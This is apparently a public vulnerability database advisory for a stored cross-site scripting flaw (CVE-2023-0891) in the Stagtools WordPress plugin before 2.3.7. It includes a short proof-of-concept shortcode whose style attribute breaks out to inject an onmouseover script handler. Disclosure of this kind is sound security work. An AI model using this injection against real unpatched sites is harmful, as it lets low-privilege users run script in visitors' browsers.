Stagtools < 2.3.7 – Contributor+ Stored XSS | CVE 2023-0891 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

Proof of Concept

1. Create a Post and add a Shortcode.
2. Paste the stagcode in the input:

```
[stag_icon icon="link" url="https://example.com/" size='100px' new_window="no" style='test-style4 fa-link" onmouseover="alert(document.domain)" x="']
```

3. Save the post. Preview it. Hover your mouse over the icon.

Affects Plugins

Fixed in 2.3.7

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

xplo1t

Submitter

xplo1t

Submitter twitter

Verified

Yes

WPVDB ID

72397fee-9768-462b-933c-400181a5487c

Timeline

Publicly Published

2023-04-05 (about 1 years ago)

Added

2023-04-05 (about 1 years ago)

Last Updated

2023-04-05 (about 1 years ago)

Other

Published

Title

Published

2023-06-15

Title

CHP Ads Block Detector < 3.9.8 - Subscriber+ Stored Cross-Site Scripting

Published

2023-08-18

Title

WP VR < 8.3.5 - Reflected XSS

Published

2022-04-25

Title

WP YouTube Live < 1.8.3 - Admin+ Stored Cross Site Scripting

Published

2018-07-24

Title

Snazzy Maps < 1.1.5 - Multiple Cross-Site Scripting (XSS)

Published

2014-08-01

Title

April's Super Functions Pack 1.4.7 - readme.php page Parameter Reflected XSS